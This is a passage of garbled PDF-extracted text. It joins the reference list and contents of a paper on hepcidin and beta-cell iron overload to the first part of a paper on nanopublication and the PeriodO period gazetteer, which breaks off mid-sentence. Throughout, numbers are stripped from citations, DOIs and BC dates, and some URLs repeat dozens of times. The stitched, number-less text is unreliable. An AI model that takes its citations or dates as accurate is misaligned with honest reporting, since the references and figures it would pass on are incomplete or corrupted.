z. iron metabolism and the role of the iron-regulating hormone hepcidin in health and disease. presse medicale e –e . (https://doi.org/ . /j. lpm. . . ) kuhn lc. iron regulatory proteins and their role in controlling iron metabolism. metallomics: integrated biometal science – . (https://doi.org/ . /c mt h) kulaksiz h, fein e, redecker p, stremmel w, adler g & cetin y. pancreatic beta-cells express hepcidin, an iron-uptake regulatory peptide. journal of endocrinology – . (https://doi. org/ . /joe- - ) aigner e, felder tk, oberkofler h, hahne p, auer s, soyal s, stadlmayr a, schwenoha k, pirich c, hengster p, et al. glucose acts as a regulator of serum iron by increasing serum hepcidin concentrations. journal of nutritional biochemistry – . (https://doi.org/ . /j.jnutbio. . . ) backe mb, moen iw, ellervik c, hansen jb & mandrup-poulsen t. iron regulation of pancreatic beta-cell functions and oxidative stress. annual review of nutrition – . (https://doi. org/ . /annurev-nutr- - ) fernandez-real jm, mcclain d & manco m. mechanisms linking glucose homeostasis and iron metabolism toward the onset and progression of type diabetes. diabetes care – . (https://doi.org/ . /dc - ) aregbesola a, voutilainen s, virtanen jk, aregbesola a & tuomainen tp. serum hepcidin concentrations and type diabetes. world journal of diabetes – . (https://doi.org/ . / wjd.v .i . ) simcox ja & mcclain da. iron and diabetes risk. cell metabolism – . (https://doi.org/ . /j.cmet. . . ) pechlaner r, weiss g, bansal s, mayr m, santer p, pallhuber b, notdurfter m, bonora e, willeit j & kiechl s. inadequate hepcidin serum concentrations predict incident type diabetes mellitus. diabetes/metabolism research and reviews – . (https:// doi.org/ . /dmrr. ) suarez-ortegon mf, moreno m, arbelaez a, xifra g, mosquera m, moreno-navarrete jm, aguilar-de plata c, esteve e, ricart w & fernandez-real jm. circulating hepcidin in type diabetes: a multivariate analysis and double blind evaluation of metformin effects. molecular nutrition and food research – . (https://doi.org/ . /mnfr. ) khan ar & awan fr. metals in the pathogenesis of type diabetes. journal of diabetes and metabolic disorders . (https://doi. org/ . / - - - ) liu kl, chen py, wang cm, chen wy, chen cw, owaga e & chang js. dose-related effects of ferric citrate supplementation on endoplasmic reticular stress responses and insulin signalling pathways in streptozotocin-nicotinamide-induced diabetes. food and function – . (https://doi.org/ . /c fo j) choi js, koh iu, lee hj, kim wh & song j. effects of excess dietary iron and fat on glucose and lipid metabolism. journal of nutritional biochemistry – . (https://doi.org/ . /j. jnutbio. . . ) mao x, chen h, tang j, wang l & shu t. hepcidin links gluco- toxicity to pancreatic beta cell dysfunction by inhibiting pdx- expression. endocrine connections – . (https://doi. org/ . /ec- - ) zhao n, zhang as & enns ca. iron regulation by hepcidin. journal of clinical investigation – . (https://doi.org/ . / jci ) rishi g, wallace df & subramaniam vn. hepcidin: regulation of the master iron regulator. bioscience reports e . (https://doi. org/ . /bsr ) hu j, kholmukhamedov a, lindsey cc, beeson cc, jaeschke h & lemasters jj. translocation of iron from lysosomes to mitochondria during acetaminophen-induced hepatocellular injury: protection by starch-desferal and minocycline. free radical biology and medicine – . (https://doi.org/ . /j. freeradbiomed. . . ) lee hj, choi js, lee hj, kim wh, park si & song j. effect of excess iron on oxidative stress and gluconeogenesis through hepcidin during mitochondrial dysfunction. journal of nutritional biochemistry – . (https://doi.org/ . /j. jnutbio. . . ) nam e, han j, suh jm, yi y & lim mh. link of impaired metal ion homeostasis to mitochondrial dysfunction in neurons. current opinion in chemical biology – . (https://doi.org/ . /j. cbpa. . . ) gerencser aa. metabolic activation-driven mitochondrial hyperpolarization predicts insulin secretion in human pancreatic beta-cells. biochimica et biophysica acta – bioenergetics – . (https://doi.org/ . /j.bbabio. . . ) zhou z, ribas v, rajbhandari p, drew bg, moore tm, fluitt ah, reddish br, whitney ka, georgia s, vergnes l, et al. estrogen receptor alpha protects pancreatic beta-cells from apoptosis by preserving mitochondrial function and suppressing endoplasmic reticulum stress. journal of biological chemistry – . (https://doi.org/ . /jbc.m . ) vecchi c, montosi g, zhang k, lamberti i, duncan sa, kaufman rj & pietrangelo a. er stress controls iron metabolism through induction of hepcidin. science – . (https://doi. org/ . /science. ) zhu y, shu t, lin y, wang h, yang j, shi y & han x. inhibition of the receptor for advanced glycation endproducts (rage) protects pancreatic beta-cells. biochemical and biophysical research communications – . (https://doi.org/ . /j. bbrc. . . ) chen j, saxena g, mungrue in, lusis aj & shalev a. thioredoxin- interacting protein: a critical link between glucose toxicity and beta- cell apoptosis. diabetes – . (https://doi.org/ . / db - ) qiao n, xu c, zhu yx, cao y, liu dc & han x. ets- as an early response gene against hypoxia-induced apoptosis in pancreatic beta- cells. cell death and disease e . (https://doi.org/ . / cddis. . ) blanchette nl, manz dh, torti fm & torti sv. modulation of hepcidin to treat iron deregulation: potential clinical applications. expert review of hematology – . (https://doi.org/ . / . . ) cooksey rc, jones d, gabrielsen s, huang j, simcox ja, luo b, soesanto y, rienhoff h, abel ed & mcclain da. dietary iron restriction or iron chelation protects from diabetes and loss of beta- cell function in the obese (ob/ob lep-/-) mouse. american journal of physiology. endocrinology and metabolism e –e . (https://doi.org/ . /ajpendo. . ) this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.lpm. . . https://doi.org/ . /j.lpm. . . https://doi.org/ . /c mt h https://doi.org/ . /joe- - https://doi.org/ . /joe- - https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /annurev-nutr- - https://doi.org/ . /annurev-nutr- - https://doi.org/ . /dc - https://doi.org/ . /wjd.v .i . https://doi.org/ . /wjd.v .i . https://doi.org/ . /j.cmet. . . https://doi.org/ . /dmrr. https://doi.org/ . /dmrr. https://doi.org/ . /mnfr. https://doi.org/ . / - - - https://doi.org/ . / - - - https://doi.org/ . /c fo j https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /ec- - https://doi.org/ . /ec- - https://doi.org/ . /jci https://doi.org/ . /jci https://doi.org/ . /bsr https://doi.org/ . /bsr https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /j.jnutbio. . . https://doi.org/ . /j.cbpa. . . https://doi.org/ . /j.cbpa. . . https://doi.org/ . /j.bbabio. . . https://doi.org/ . /jbc.m . https://doi.org/ . /science. https://doi.org/ . /science. https://doi.org/ . /j.bbrc. . . https://doi.org/ . /j.bbrc. . . https://doi.org/ . /db - https://doi.org/ . /db - https://doi.org/ . /cddis. . https://doi.org/ . /cddis. . https://doi.org/ . / . . https://doi.org/ . / . . https://doi.org/ . /ajpendo. . http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com t shu, z lv et al. low hepcidin impaired mitochondria function pb– : girelli d, nemeth e & swinkels dw. hepcidin in the diagnosis of iron disorders. blood – . (https://doi.org/ . / blood- - - ) saporito-magrina c, musacco-sebio r, acosta jm, bajicoff s, paredes-fleitas p, reynoso s, boveris a & repetto mg. copper(ii) and iron(iii) ions inhibit respiration and increase free radical- mediated phospholipid peroxidation in rat liver mitochondria: effect of antioxidants. journal of inorganic biochemistry – . (https://doi.org/ . /j.jinorgbio. . . ) moles a, torres s, baulies a, garcia-ruiz c & fernandez-checa jc. mitochondrial-lysosomal axis in acetaminophen hepatotoxicity. frontiers in pharmacology . (https://doi.org/ . / fphar. . ) urrutia pj, aguirre p, tapia v, carrasco cm, mena np & nunez mt. cell death induced by mitochondrial complex i inhibition is mediated by iron regulatory protein . biochimica et biophysica acta – molecular basis of disease – . (https://doi. org/ . /j.bbadis. . . ) zhao mh, liang s, kim sh, cui xs & kim nh. fe(iii) is essential for porcine embryonic development via mitochondrial function maintenance. plos one e . (https://doi. org/ . /journal.pone. ) hirota k. an intimate crosstalk between iron homeostasis and oxygen metabolism regulated by the hypoxia-inducible factors (hifs). free radical biology and medicine – . (https:// doi.org/ . /j.freeradbiomed. . . ) hansen jb, dos santos lrb, liu y, prentice kj, teudt f, tonnesen m, jonas jc, wheeler mb & mandrup-poulsen t. glucolipotoxic conditions induce β-cell iron import, cytosolic ros formation and apoptosis. journal of molecular endocrinology – . (https:// doi.org/ . /jme- - ) mastrogiannaki m, matak p, keith b, simon mc, vaulont s & peyssonnaux c. hif- alpha, but not hif- alpha, promotes iron absorption in mice. journal of clinical investigation – . (https://doi.org/ . /jci ) shah ym, matsubara t, ito s, yim sh & gonzalez fj. intestinal hypoxia-inducible transcription factors are essential for iron absorption following iron deficiency. cell metabolism – . (https://doi.org/ . /j.cmet. . . ) matsunaga t, li s, adachi t, joo e, gu n, yamazaki h, yasuda k, kondoh t & tsuda k. hyperoxia reverses glucotoxicity-induced inhibition of insulin secretion in rat ins- beta cells. bioscience, biotechnology, and biochemistry – . (https://doi.org/ . / . . ) bensellam m, duvillie b, rybachuk g, laybutt dr, magnan c, guiot y, pouyssegur j & jonas jc. glucose-induced o( ) consumption activates hypoxia inducible factors and in rat insulin-secreting pancreatic beta-cells. plos one e . (https://doi.org/ . /journal.pone. ) suzuki k, sato y, kai s, nishi k, adachi t, matsuo y & hirota k. volatile anesthetics suppress glucose-stimulated insulin secretion in min cells by inhibiting glucose-induced activation of hypoxia- inducible factor . peerj e . (https://doi.org/ . / peerj. ) mitrakou a, katsiki n & lalic nm. type diabetes mellitus and the elderly: an update on drugs used to treat glycaemia. current vascular pharmacology – . (https://doi.org/ . / ) received in final form january accepted january this work is licensed under a creative commons attribution . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /blood- - - https://doi.org/ . /blood- - - https://doi.org/ . /j.jinorgbio. . . https://doi.org/ . /fphar. . https://doi.org/ . /fphar. . https://doi.org/ . /j.bbadis. . . https://doi.org/ . /j.bbadis. . . https://doi.org/ . /journal.pone. https://doi.org/ . /journal.pone. https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /j.freeradbiomed. . . https://doi.org/ . /jme- - https://doi.org/ . /jme- - https://doi.org/ . /jci https://doi.org/ . /j.cmet. . . https://doi.org/ . / . . https://doi.org/ . / . . https://doi.org/ . /journal.pone. https://doi.org/ . /peerj. https://doi.org/ . /peerj. https://doi.org/ . / https://doi.org/ . / http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction materials and methods cell culture virus construction and gene infected pancreatic islet isolation gsis assay hepcidin and ferritin content analysis rna extraction, reverse transcription and qrt-pcr western blotting fluorescence in situ hybridization (fish) cytosolic chelatable iron assay prussian blue staining ros determination determination of mitochondrial membrane potential (Δψm) determination of adenosine ′-triphosphate (atp) release animals, treatment and blood parameter determination statistical analysis results hyperglycemia inhibits hepcidin expression in db/db mice, cultured mouse islets and min cells low hepcidin expression induces iron overload in pancreatic β-cells iron aggregation induces ros generation which impairs mitochondria function excess mitochondrial iron induces ΔΨm depolarization and inhibits atp synthesis effects of iron restriction on blood glucose levels and insulin levels in db/db mice discussion supplementary data declaration of interest funding author contribution statement data availability statement nanopublication beyond the sciences: the periodo period gazetteer submitted august accepted january published february corresponding author patrick golden, ptgolden@email.unc.edu academic editor edward fox additional information and declarations can be found on page doi . /peerj-cs. copyright golden and shaw distributed under creative commons cc-by . open access nanopublication beyond the sciences: the periodo period gazetteer patrick golden and ryan shaw school of information and library science, university of north carolina at chapel hill, chapel hill, nc, united states abstract the information expressed in humanities datasets is inextricably tied to a wider discursive environment that is irreducible to complete formal representation. humanities scholars must wrestle with this fact when they attempt to publish or consume structured data. the practice of “nanopublication,” which originated in the e-science domain, offers a way to maintain the connection between formal representations of humanities data and its discursive basis. in this paper we describe nanopublication, its potential applicability to the humanities, and our experience curating humanities nanopublications in the periodo period gazetteer. subjects digital libraries, world wide web and web science keywords nanopublication, periodization, scholarly communication, time, linked data, json-ld introduction humanities scholars who wish to make their research materials usable with networked digital tools face a common dilemma: how can one publish research materials as “data” without severing them from the ideas and texts that originally gave them meaning? the kinds of information produced in the humanities—biographical details, political and temporal boundaries, and relationships between people, places, and events—are inextricably tied to arguments made by humanities scholars. converting all, or even much, of the information expressed in scholarly discourse into algorithmically processable chunks of formal, structured data has so far proven to be extraordinarily difficult. but rather than attempt to exhaustively represent her research, a scholar can promote small pieces of information within her work using the practice of nanopublication (mons & velterop, ). nanopublications include useful and usable representations of the provenance of structured assertions. these representations of provenance are useful because they allow consumers of the published data to make connections to other sources of information about the context of the production of that data. in this way, they strike a balance between the needs of computers for uniformity in data modeling with the needs of humans to judge information based on the wider context of its production. an emphasis on connecting assertions with their authors is particularly well-suited for the needs of humanities scholars. by adopting nanopublication, creators of datasets in the humanities can focus on publishing small units of practically useful, curated assertions while keeping a persistent pointer to the basis of those claims—the discourse of scholarly publishing itself—rather than its isolated representation in formal logic. how to cite this article golden and shaw ( ), nanopublication beyond the sciences: the periodo period gazetteer. peerj comput. sci. :e ; doi . /peerj-cs. mailto:ptgolden@email.unc.edu https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. we offer as an example of this approach the periodo period gazetteer, which collects definitions of time periods made by archaeologists and other historical scholars (http: //perio.do). a major goal of the gazetteer was to make period definitions parsable and comparable by computers, while also retaining links to the broader scholarly context in which they were conceived. we found that a nanopublication-centric approach allowed us to achieve this goal. in this paper, we describe the concept of nanopublication, its origin in the hard sciences, and its applicability to the humanities. we then describe the periodo period gazetteer in detail, discuss our experience mapping nonscientific data into nanopublications, and offer advice to other humanities-oriented projects attempting to do the same. nanopublications nanopublication is an approach to publishing research in which individual research findings are modeled as structured data in such a way that they retain information about their provenance. this is in contrast to both traditional narrative publishing, where research findings are not typically published in a structured, computer readable format, and “data dumps” of research findings which are typically published without any embedded information about their origin or production. the nanopublication approach is motivated by a desire to publish structured data without losing the wider research context and the benefits of traditional scholarly communication (groth, gibson & velterop, ). nanopublication emerged from work in data-intensive sciences like genomics and bioinformatics, where recent advances in computational measurement techniques have vastly lowered the barrier to collecting genetic sequencing data. as a result, millions of papers have been published with findings based on these new methods. however, the reported results are almost always published in the form of traditional narrative scholarly publications (mons et al., ). while narrative results can be read and understood by humans, they are not so easily digested by computers. in fields where computation has been the key to the ability to ask new and broader questions, it should surely be the case that research results are published in such a way that they are able to be easily parsed, collected, and compared by computer programs and the researchers who use them. on the occasions when research data are released and shared, they are often distributed on their own, stripped of the context necessary to locate them within a broad research environment (the identity of the researchers, where and how this research was conducted, etc.). in this case, publishing practice has swung too far to the opposite extreme. in the service of creating and sharing discrete datasets, the published results have been stripped of their provenance and their position within the wider scholarly endeavor that culminated in their publication. this contextual information is crucial for researchers to determine the trustworthiness of the dataset and learn about the broader project of research from which they resulted. nanopublication offers a supplementary form of publishing alongside traditional narrative publications. a nanopublication consists of three parts, all representable by rdf graphs: golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://perio.do http://dx.doi.org/ . /peerj-cs. . an assertion (a small, unambiguous unit of information) . the provenance of that assertion (who made that assertion, where, when, etc.) . the provenance of the nanopublication itself (who formed or extracted the assertion, when, and by what method) the formal definitions of these parts are specified by an owl ontology (groth et al., ). by representing their research in nanopublications alongside their narrative reports, researchers can publish their data in such a way that the data remain within their human context while also being easily digested by computer programs. authors are encouraged to include the smallest possible unambiguous pieces of information as the assertions at the center of a nanopublication. in the bioscience context, these assertions could range from statements of causality, to measurements of gene expressions or gene-disease associations, to statistics about drug interactions. the scope and nature of appropriate units of nanopublication inevitably vary by discipline. multiple statements of identical or closely related facts can be connected with different sources of provenance, thereby potentially augmenting the ability of consumers to judge the quality of assertions. groth, gibson & velterop ( ) call the collection of nanopublications all referring to the same assertion “s-evidence,” and cite the potential benefits of the ability to automatically connect findings across research publications. several european repositories of bioinformatic data have begun to publish their con- tents as nanopublications, including the biosemantics group (http://www.biosemantics. org), nextprot (http://nextprot.org/), and disgenet (http://www.disgenet.org/web/ disgenet/v . ). these publications can be aggregated and connected in larger systems, such as the decentralized reputation system described by kuhn ( ). nanopublication in the humanities while the bioinformatics research community has enthusiastically adopted nanopub- lication, other disciplines have been slow to follow. gradmann ( ) suggested that specialized and stable terminologies, as well as sufficient funding to organize these terminologies in formal ontologies, may be prerequisites for the successful deployment of nanopublication. thus while he expects other scientific, technical, and medical disciplines to eventually embrace nanopublication, he is less sure that nanopublication will work for the humanities. historians, for example, use relatively little specialized terminology and pride themselves on their ability to use “ordinary language” to represent the past. even when humanities scholars use specialized theoretical language, their use of this language is often unstable, ambiguous, and highly contested. perhaps, then, a publishing technique that seeks to eliminate such ambiguity is ill-suited for these fields. a related obstacle to the adoption of nanopublication beyond the hard sciences has to do with differences in the role played by “facts.” researchers trained in the hard sciences understand their work to be cumulative: scientists “stand on the shoulders of giants” and build upon the work of earlier researchers. while scientists can in principle go back and recreate the experiments of their predecessors, in practice they do this only when the results golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://www.biosemantics.org http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://nextprot.org/ http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://www.disgenet.org/web/disgenet/v . http://dx.doi.org/ . /peerj-cs. of those experiments have not been sufficiently established as facts. efficient cumulative research requires that, most of the time, they simply trust that the facts they inherit work as advertised. something like this process seems to be assumed by many proponents of nanopublications. for example, mons & velterop ( ) claim that a major goal of nanopublication is to “elevate” factual observations made by scientists into standardized packages that can be accumulated in databases, at least until they are proved wrong. these standardized packages can then be automatically or semi-automatically analyzed to produce new factual observations (or hypotheses about potential observations), and the cycle continues. yet as mink ( ) observed, not all forms of research and scholarship are aimed at producing “detachable conclusions” that can serve as the basis for a cumulative process of knowledge production. anticipating gradmann, mink argued that detachable conclusions are possible in science because—and only because—of its theoretical structure. the division of labor in research requires that concepts have a uniformity of meaning, and the methodological problem of definition therefore becomes central (mink, , ). mink contrasted science to the study of history, which, lacking both explicit methodology and uniform consensus on the meanings of its concepts, does not produce “detachable conclusions.” but this does not mean that historical scholarship fails to produce knowl- edge, only that it is a separate and autonomous mode of understanding. the goal of most historical scholarship is not to establish conclusions by constructing an explanatory chain of inferences from evidence. rather the goal is to render what mink called a “synoptic judgment,” an interpretive act in which the scholar comes to “see together” the disparate observable elements of some phenomena as a synthetic whole. the historian who judges the advent of printing to have constituted a “communications revolution” (eisenstein, ) has not made an inference from the available evidence but has constructed a particular interpretation of that evidence. to communicate her synoptic judgment to others, she cannot simply state her conclusions unambiguously and rely on her audience’s theoretical understanding to make them meaningful; instead she must arrange and exhibit the evidence to help them “see together” what she saw. so is nanopublication a poor fit for fields of knowledge production that do not follow the model of cumulative science? we believe the answer is no. first of all, even mink did not argue that there were no facts in history, only that the significant conclusions drawn by historians do not typically take the form of factual statements. there are plenty of equivalents in history and the humanities to the databases of curated factual statements that exists in the sciences: prosopographical databases (bradley & short, ), digital historical gazetteers (elliott & gillies, ), not to mention the catalogs and indexes of bibliographical data that make humanities scholarship possible (buckland, ). some of these facts may be vague or uncertain, but as kuhn et al. ( ) observe, even knowledge that cannot be completely formally represented, including vague or uncertain scientific findings, can benefit from the nanopublication approach. we agree but would go further golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. to say that nanopublication is useful even for information that is neither testable nor falsifiable, exemplified by mink’s synoptic judgments. we have demonstrated the utility of nanopublications for describing synoptic judgments of historical periodization in the periodo period gazetteer, which we describe below. the periodo period gazetteer in their work, archaeologists and historians frequently refer to time periods, such as the “classical iberian period” or the “progressive era.” these time periods are shorthand representations of commonly referenced segments of time and space. while time periods might have commonly understood definitions, they are typically scattered throughout myriad publications and are treated as shared, assumed knowledge. this leads to difficulty and repeated effort when scholars want to visualize their data in space and over time, which requires mapping these discursive period labels to discrete spatiotemporal ranges (rabinowitz, ). to build the periodo gazetteer, we compiled thousands of definitions of time periods from published sources within the fields of archaeology, history, and art history. we mapped these time periods to a consistent data model and published them as linked open data (heath & bizer, ) so that future scholars would be able to link their uses of period terms to information about the provenance of those terms. a web-based faceted browsing interface allows scholars to find and compare period definitions (see fig. ), or software developers can use the periodo data directly in their own systems. the gazetteer is editable via http; contributors can submit proposed changes in the form of patches, and the periodo editors can accept or reject them. all proposed and accepted changes are stored, and each period definition has a history of changes in the form of patch submissions and approvals (shaw et al., ). to ease the process of creating patches that conform to the periodo data model, we developed an editing interface that runs in a standard web browser (see fig. ). data model periodo defines a “period definition” as a scholarly assertion about the name and spatiotemporal extent of a period. the core of a period definition consists of text quoted from the original source indicating the name of the period, its temporal range, and the geographic region to which it applies. multiple period definitions from the same source are grouped into a period collection. for example, the article “domestic architecture and social differences in north-eastern iberia during the iron age (c. – bc)” includes the following sentence: for the catalan area, the complete system with the four above-mentioned categories is not as clearly documented before the fourth century as it is during the classical iberian period ( – bc), although differences in the size of the sites, as well as the specialization of the functions of some settlements, can be already detected during the early iberian period ( – bc) (belarte, ). golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. this sentence contains two assertions defining period extents, so it is modeled in periodo as two period definitions. the first definition has the label “classical iberian period” and its start and end points are labeled as “ bc” and “ bc” respectively. the second definition has the label “early iberian period” and its start and end points are labeled as “ bc” and “ bc” respectively. the spatial extent of both definitions is labeled as “catalan area”. all of these labels are taken verbatim from the source text and should never change. because they come from the same source, these two period definitions are grouped into a period collection. the bibliographic metadata for the source article is associated with this period collection. (in the event that a source defines only a single period, then the period collection will be a singleton.) belonging to the same period collection does not imply that period definitions compose a periodization. a periodization is a single coherent, continuous division of historical time, each part of which is labeled with a period term. a period collection, on the other hand, is simply a set of period definitions that share the same source. when the period definitions in a period collection do compose a periodization, this can be indicated through the addition of statements relating the period definitions to one another, e.g., as belonging to the same periodization and having a specific ordering. because source languages, dating systems, and naming of geographical regions can vary widely, labels taken verbatim from source documents are insufficient for indexing and visualizing period definitions in a uniform way. thus the rest of the periodo data model consists of properties added by periodo curators to normalize the semantic content of these textual labels. first, all periods originally defined in a language other than english are given an alternate english-language label. when a period definition was originally defined in english, the alternate label may make minor changes for consistency. for example, belarte’s definition of the “classical iberian period” period was given an alternate label of “classical iberian”, removing the word “period” for brevity and consistency with other definitions. next, the specification of temporal start and end points is standardized by adding iso lexical representations of proleptic gregorian calendar years : - for proleptic refers to dates represented in some calendar system that refer to a time prior to that calendar’s creation. the gregorian calendar was adopted in , but most of our dates fall in years prior to that one. “ bc” and - for “ bc”. finally, descriptions of spatial extent are normalized by adding references to “spatial things”, typically modern nation-states. in this case both definitions are linked to the spatial thing identified by http://dbpedia.org/resource/spain. the complete periodo representation in turtle of belarte’s collection of period definitions is given in fig. . turtle is a human-readable syntax for serializing rdf graphs (carothers & prud’hommeaux, ). periodo as linked data we have taken pains to make it easy to work with the periodo dataset, particularly keeping in mind developers who do not use an rdf-based tool stack. the dataset is published as json, which is easily parsed using standard libraries in most programming environments including, of course, web browsers. but while json provides an easy and convenient way to work with the periodo dataset by itself, we knew that many users would want to combine it with the growing body of scholarly linked data being published on golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dbpedia.org/resource/spain http://dx.doi.org/ . /peerj-cs. figure turtle representation of a periodo period collection containing two period definitions originally published by belarte ( ). golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. the web. most of our initial contributors of period definitions work in archaeology, a discipline that has several large, well-curated, interlinked, widely used and well-maintained linked data datasets (isaksen et al., ). thus, we take advantage of the recent w c recommendation of json-ld (sporny, kellogg & lanthaler, ) to make the periodo dataset available as linked data. by providing a json-ld context for the periodo dataset, we have made it usable within an rdf-based stack. rdf vocabularies the json-ld context maps relationships between periodo entities to terms from rdf vocabularies. of these, the most important is skos (hobbs & pan, ). the human-readable labels for a periodo definition are mapped to the skos preflabel and altlabel properties, implying that a periodo period definition can be interpreted as a skos concept. the relationship between a period definition and the period collection to which it belongs is mapped to the skos inscheme property, implying that a period collection is a skos conceptscheme. the relationship between a period collection and its source is mapped to the dcmi source term, and the various properties in the bibliographic description of the source are mapped to their own appropriate dcmi terms. finally, the relation between a period definition and its geographical extent is mapped to the dcmi spatial term. the relationships between a period definition and the start and end of its tem- poral extent are respectively mapped to the owl-time intervalstartedby and intervalfinishedby properties. this implies that a period definition, in addition to being a skos concept, is an owl-time properinterval (an interval of time having non-zero duration). importantly, it also implies that the start and end of a period definition’s temporal extent are themselves properintervals, not points or instants. this is important because the beginnings and endings of historical periods can never be precisely determined. in the example of the classical iberian period given above, both the beginning and the end of the period are interpreted as intervals with a duration of one year. interpreting period starts and ends as properintervals allows us to make a distinction between the intervals themselves and their descriptions: though the intervals themselves are not precisely specifiable, we can create pragmatic owl-time datetimedescriptions of them for the purposes of comparison and visualization. the start and end of a period definition’s temporal extent are themselves intervals with their own starts and ends, so temporal extent can be associated with a maximum of four values. this is interoperable with other proposed representations of fuzzy, imprecise, or uncertain temporal extents, such as the four start, stop, earliest, latest keys proposed for geojson-ld (gillies, ). in the current periodo data set these four properties only have (iso ) year values, because none of our sources specified endpoints at a more granular level than year. however, we expect to have finer-grained values as we add periodizations of more recent history. at that point we will need to decide upon a unit of representation that makes it simple to compare intervals defined at different levels of granularity. adding complexity to time interval expressions will be golden and shaw ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. possible without changing our underlying data model because of the flexibility of our current approach. the start, latest start, earliest end, end approach enables us to represent the most common patterns for defining periods found in our sources. for example a period defined as starting “ b.c. (± years)” and ending “about b.c.” can be represented with three values: − , − , and − . kauppinen et al. ( ) propose defining curves over intervals to represent fuzziness, imprecision, or uncertainty in order to maximize precision and recall with respect to temporal relevance judgments made by experts. we have chosen not to support such more complex representations at this time because we are focused primarily on representing periods as defined in textual sources. natural language is already a compact and easily indexable way to represent imprecision or uncertainty. rather than imposing an arbitrary mapping from 